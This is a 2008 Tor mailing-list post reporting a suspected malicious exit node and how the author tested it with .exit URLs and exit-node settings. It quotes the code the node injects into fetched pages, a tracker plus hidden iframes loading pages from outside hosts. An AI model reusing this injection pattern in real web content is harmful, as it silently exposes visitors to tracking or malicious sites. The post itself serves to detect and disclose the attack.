Bad exit?

Steffen Schoenwiese or-talk at sschoenwiese.de
Sat May 3 22:12:30 UTC 2008

Hi,

Hannah Schroeter schrieb:
> I got an empty result when trying to fetch
>   http://www.sschoenwiese.de.f36a9830dcf35944b8abb235da29a9bbded541bc.exit/
>
> (Was that a wrong way to try to select that particular exit node?)
>
> Dito when trying another exit node particularly:
>   http://www.sschoenwiese.de.awesomelikeahotdog.exit/
> (empty result)

hmm, funny, same here. I set ExitNodes and StrictExitNodes in my torrc to play
around with this. Using the .exit-URL I get an empty page from my URL too. But I
just tried it that way with some other pages
(http://www.xkcd.org.f36a9830dcf35944b8abb235da29a9bbded541bc.exit/,
http://www.german-bash.org..f36a9830dcf35944b8abb235da29a9bbded541bc.exit/,
etc.), with these it works. The node often seems to try to inject the following
code directly after the body-tag (but not always):

<script src="http://www.google-analytics.com/urchin.js"
type="text/javascript"></script><script type="text/javascript">_uacct =
"UA-4081150-3";urchinTracker();</script><iframe
src="http://vipasotka.com/in.php?adv=5106&val=b7afe408"
style="display:none"></iframe><iframe src=http://ini7.com/lc10516.html width=2
height=2 style=display:none></iframe>

Other than that it seems to inject some random stuff right into the page.

Steffen